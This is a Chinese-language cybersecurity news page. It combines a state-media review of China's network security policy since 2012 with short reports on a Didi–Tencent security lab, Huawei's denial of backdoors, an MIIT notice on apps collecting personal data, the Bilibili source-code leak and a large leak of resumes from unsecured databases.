共同织密网络安全防护网 ——党的十八大以来网络安全工作综述   当今中国,网信事业蓬勃发展,网民数量全球第一、电子商务总量全球第一。必须正确把握安全与发展的关系,让网络空间既充满活力又安全清朗。 “没有网络安全就没有国家安全。”党的十八大以来,以习近平同志为核心的党中央系统部署和全面推进网络安全和信息化工作。在习近平总书记关于网络强国的重要思想指引下,我国网络空间日渐清朗,网络安全保障体系日益完善,网络安全保障能力不断增强,网络空间命运共同体主张获得国际社会广泛认同。   全面构建网络安全制度体系 2015年12月,全球连锁酒店凯悦集团支付系统被恶意软件入侵,大量用户数据外泄;2018年3月,某社交平台有超过5000万名用户个人资料疑遭泄露…… 近年来,类似的黑客攻击和个人信息泄露时有发生,网络安全愈发引人关注。 习近平总书记深刻指出:“网络空间不是‘法外之地’。网络空间是虚拟的,但运用网络空间的主体是现实的,大家都应该遵守法律,明确各方权利义务。” 依法管网、依法办网、依法上网,确保互联网在法治轨道上健康运行,正是破题之策。党的十八大以来,我国始终坚持依法治网,形成党委领导、政府管理、企业履责、社会监督、网民自律等多主体参与的网络安全治理格局。 ——出台网络安全法、国家网络空间安全战略、“十三五”国家信息化规划等网络安全法律法规和战略规划,制定发布网络安全国家标准289项,网络安全各项工作纳入法治化轨道; ——组织开展移动互联网应用(APP)违法违规收集使用个人信息专项治理,对存在严重问题的APP采取约谈、公开曝光、下架等处罚措施,切实维护广大网民在网络空间的合法权益; ——建立关键信息基础设施安全保护制度,明确关键信息基础设施范围及保护工作部门,建立健全安全保护责任制,强化供应链安全管理和重要数据安全管理,加强监测预警和应急处置工作,不断提升安全防护能力。 近年来,国家相关部门持续开展“净网”“剑网”“清源”“护苗”等系列专项治理行动,网络谣言、网络色情等乱象得到有效整治。其中,针对老百姓深恶痛绝的电信网络诈骗犯罪,公安机关坚持侦查打击、重点整治、防范治理三管齐下。今年1至7月,共抓获电信网络诈骗犯罪嫌疑人6.5万名,破获电信网络诈骗案件7.5万起,同比分别上升32.3%和8.6%。自今年5月以来,发案数量与去年同期相比,连续4个月保持下降趋势。   共筑风清气正的网络家园 联合整治炒作明星绯闻隐私和娱乐八卦、约谈直播短视频平台、将违规网络主播纳入跨平台禁播黑名单……2018年以来,国家主管部门协同发力,对当前社交媒体及网络视频平台上存在的违法违规行为打出一系列“组合重拳”。 “还网络空间以风清气正,一定要好好整治这些乱象!”“严管这些带来负能量的主播们!”网民们支持、点赞的声音反映了广大人民群众对让网络空间清朗起来的热切期盼。 网络空间是亿万民众共同的精神家园,网络空间天朗气清、生态良好,符合人民利益。习近平总书记强调,我们要本着对社会负责、对人民负责的态度,依法加强网络空间治理,加强网络内容建设,做强网上正面宣传,培育积极健康、向上向善的网络文化,用社会主义核心价值观和人类优秀文明成果滋养人心、滋养社会,做到正能量充沛、主旋律高昂,为广大网民特别是青少年营造一个风清气正的网络空间。 从《“一带一路”大道之行》到《小账本连着大情怀》,从“砥砺奋进的五年”到“壮丽70年 奋斗新时代”,党的十八大以来,重大主题宣传综合运用互联网传播方式手段,形成“往深里走、往心里走、往实里走”的宣传效果。 抗灾救灾时的守望相助、见义勇为中的果敢无畏、热心公益里的慷慨解囊……党的十八大以来,正能量越来越多、越来越广地在网络上传播,那些感动中国的好人好事、浸润心灵的良知义举,生动具体地诠释着中国特色社会主义核心价值观,网络空间日益成为亿万民众共同的精神家园。   培育网络安全技术、产业、人才 商场购物,街边买菜,生活缴费,扫码支付已成常态。然而,享受便利的同时,人们也受到欺诈、盗窃等违法犯罪行为的滋扰。 如何让“扫一扫”更安全?支付宝推出保障计划,通过自主研发的智能实时风控系统,对每笔移动支付进行木马、钓鱼等8个维度的风险检测,防止二维码被复制和泄露,此外还配合人脸识别、眼纹等技术进行多因子验证,保障用户扫码支付安全。 “网络安全和信息化是一体之两翼、驱动之双轮。”网络安全,需要信息化发展作支撑,信息化发展需要网络安全来保障。 党的十八大以来,网络安全新兴技术不断涌现,防护网不断织密。一张小卡片能阻止敏感信息的获取、在线签证核身技术从源头对非法入境行为进行识别和拦截……网络安全产业迅速发展,增速领跑全球,根据中国信息通信研究院测算数据,2018年我国网络安全产业规模预计达545.49亿元。 “网络空间的竞争,归根到底是人才的竞争。”培养网络安全人才,才能夯实网络安全根基,更好地推动技术创新和产业发展,为建设网络强国提供智力支撑和人才保障。 2017年,中央网信办、教育部将西安电子科技大学、东南大学、武汉大学、北京航空航天大学、四川大学、中国科学技术大学、战略支援部队信息工程大学等7所高校,评选为首批一流网络安全学院建设示范项目高校。截至目前,已有40余所高校成立网络空间安全学院。 “网络安全人才培养和教育,不能孤立发展、闭门造车,而是要打造适应时代需要的复合型网络安全人才。”中国科学技术大学网络空间安全学院副院长、教授俞能海说。 推动全球网络安全治理体系变革 一个安全稳定繁荣的网络空间,对各国和世界都具有重大意义。如何共同维护网络安全,成为世界性课题。 “网络安全是全球性挑战,没有哪个国家能够置身事外、独善其身,维护网络安全是国际社会的共同责任。” “维护网络安全不应有双重标准,不能一个国家安全而其他国家不安全,一部分国家安全而另一部分国家不安全,更不能以牺牲别国安全谋求自身所谓绝对安全。” 在2015年第二届世界互联网大会开幕式上,习近平总书记向世界发出携手共建“网络空间命运共同体”的倡议,提出推进全球网络安全治理体系变革的“中国方案”,受到高度评价和广泛赞誉。 “‘中国的网络观’让人印象深刻。”著名计算机科学家罗伯特·卡恩说,习近平主席的一系列阐述,表明了互联网是一个非常独特的共同家园,所有人应该共同承担责任。 携手共建,方能乘风破浪。近年来,在中国的积极倡导下,从《网络空间国际合作战略》的发布,到杭州G20峰会《二十国集团数字经济发展与合作倡议》的签署,中国不断深化网络空间国际合作,推动世界各国共同构建一个安全稳定繁荣的网络空间。 中国不仅为推进全球网络安全治理体系变革提供“中国方案”,更以实际行动为世界网络安全和发展贡献中国力量。一大批优秀企业走出国门,在宽带信息基础设施、大数据、网络安全服务等新兴产业领域,为世界各国提供高质量的信息产品和安全技术服务。 “中国在共建网络空间命运共同体中扮演的角色十分重要。”塞尔维亚贸易旅游与通信部国务秘书塔提亚娜·马迪奇表示,作为世界上最大的发展中国家,中国保持自身安全发展的同时,还致力于推动世界各国共同搭乘互联网发展的快车,积极构建安全与公平的网络新秩序,“这为世界树立了榜样!”   (稿源:人民网,封面源自网络。)

滴滴腾讯建互联网安全联合实验室 聚焦安全能力建设

讯 7月30日下午消息,滴滴出行今日宣布,滴滴安全产品技术部携手腾讯安全成立互联网安全联合实验室,该实验室将聚焦信息安全、业务安全和前沿安全三大领域,以提升用户数据安全保护能力,并且共同打击网络犯罪。 据了解,该互联网安全联合实验室专注的三大安全研究领域分别为:信息安全领域,包含关键信息保护联合能力建设、针对新形态API数据安全联合能力建设;其二是业务安全领域,主要涵盖人脸识别技术、交易反欺诈安全模型等;其三是前沿安全领域,比如车联网前沿安全技术研究、自动驾驶安全等。 滴滴信息安全战略副总裁弓峰敏表示:“腾讯安全在攻防能力建设、汽车安全系统性评估、交易反作弊的积累,以及在社交平台上积累的高水平大数据管理经验是众所周知的,最近腾讯对共建大数据合作生态的投入与滴滴的思路不谋而和。我们双方会在黑灰产对抗、安全准入及交易反欺诈,以及智能汽车安全和黑产有效情报分享技术等方面深度合作,为业界积累经验,作出典范。” 腾讯副总裁丁珂表示:“滴滴一直以来都是行业内领先的服务商,致力于用科技为用户提供美好的出行体验,在推动行业变革上产生了积极的重要影响。除了在网约车领域,滴滴也在智慧交通、智能驾驶等领域发力,积极探索未来的交通形态。这一次成立网络安全联合实验室,是腾讯和滴滴在互联网安全领域合作的进一步深化,我们也希望可以为保障智慧出行安全尽一份力量。” 今年4月,滴滴出行宣布升级集团安全产品与技术部,赋能各业务线信息安全技术能力,为业务发展提供针对性的信息安全技术支持。在打击黑灰产方面,今年上半年,滴滴利用安全技术协助警方办理黑产案件12宗,已抓获嫌疑人179人。   (稿源:,稿件以及封面源自网络。)

华为:和运营商建 1500 多张网络 没证据证明设备有后门

7月12日上午消息,华为发布《2018可持续发展报告》称,过去30年,华为和运营商一起建设了1500多张网络,在全球170多个国家和地区,为30亿人提供网络服务。事实证明,华为为客户建设的网络没有大面积的网络瘫痪,没有恶性的网络安全事故,也没有任何证据证明华为的设备有后门,华为的产品一直在行业中保持着良好的安全运行记录。 华为报告声明,迄今为止,华为没有任何法定义务在华为设备中或者允许他人在华为设备中安装“后门”,也没有任何法定义务为任何人收集情报信息。未来也会严格按照法律赋予的权利和程序来处理这样的诉求,华为以客户为中心,并致力于保护客户或者用户的合法权益不会受到侵害。 华为表示,已经构建起完善的网络安全保障体系,并积极地通过外部独立第三方安全机构对华为的产品进行认证。报告还提到,近期第三方独立评估机构CFI颁布的报告显示,华为设备运行的稳定性和可靠性连续三年高于行业平均水平。   (稿源:,稿件以及封面源自网络。)

工信部:网易考拉、小红书、饿了么等未经用户同意收集个人信息

7月1日,工业和信息化部(以下简称工信部)网站发布《工业和信息化部关于电信服务质量的通告(2019年第2号)》,对100家互联网企业106项互联网服务进行抽查,发现18家互联网企业存在未公示用户个人信息收集使用规则、未告知查询更正信息的渠道、未提供账号注销服务等问题(详见附件1),已责令相关企业整改。 其中,小红书、猎豹浏览器、饿了么、网易考拉、神州租车等多个App及网站存在未经用户同意收集个人信息的问题。 具体名单如下:   (稿源:工信部网站,封面源自网络。)

B站网站后台工程源码疑似泄露 内含部分用户名密码

4月22日消息,据微博@互联网的那点事 爆料称,哔哩哔哩(B站)整个网站后台工程源码泄露,并且“不少用户名密码被硬编码在代码里面,谁都可以用。”在GitHub上查询后发现,平台上确实存在由一个名叫“openbilibili”的用户创建的“go-common”代码库。截至发稿时,该项目已获得6597个标星和6050个代码库分支(fork)。    针对此事,B站做出回应,“经内部紧急核查,确认该部分代码属于较老的历史版本。”B站表示,已经执行了主动防御措施,确认此事件不会影响网站安全和用户数据安全。B站已第一时间报案,并将彻查源头。   (稿源:,稿件以及封面源自网络。)

研究人员发现中国企业简历信息泄露:涉5.9亿份简历

讯 北京时间4月8日上午消息,据美国科技媒体ZDNet报道,有研究人员发现,中国企业今年前3个月出现数起简历信息泄露事故,涉及5.9亿份简历。大多数简历之所以泄露,主要是因为MongoDB和ElasticSearch服务器安全措施不到位,不需要密码就能在网上看到信息,或者是因为防火墙出现错误导致。 在过去几个月,尤其是过去几周,ZDNet收到一些服务器泄露信息的相关消息,这些服务器属于中国HR企业。发现信息泄露的安全研究者叫山亚·简恩(Sanyam Jain)。单是在过去一个月,简恩就发现并汇报了7宗泄露事件,其中已经有4起泄露事故得到修复。 例如,3月10日,简恩发现有一台ElasticSearch不安全,里面存放3300万中国用户的简历。他将问题报告给中国国家计算机应急响应小组(CNCERT),4天之后数据库修正了问题。 3月13日,简恩又发现一台ElasticSearch不安全,里面存放8480万份简历,在CNCERT的帮助下,问题也得到解决。 3月15日,简恩又找到一台问题ElasticSearch服务器,里面存放9300万份简历。简恩说:“数据库意外离线,我向CNCERT汇报,还没有收到回应。” 第四台服务器存放来自中国企业的简历数据,里面有900万份简历,服务器同样来自ElasticSearch。 还有第五个泄露点,这是一个ElasticSearch服务器集群,里面存放的简历超过1.29亿份。简恩无法确认所有者,目前数据库仍然门户大开。 简恩还发现另外两个泄露点,只是规模较小。一台ElasticSearch服务器存放18万份简历,一台存放17000份简历。 简单统计,中国企业在过去3个月泄露的简历达以5.90497亿份。   (稿源:,稿件以及封面源自网络。)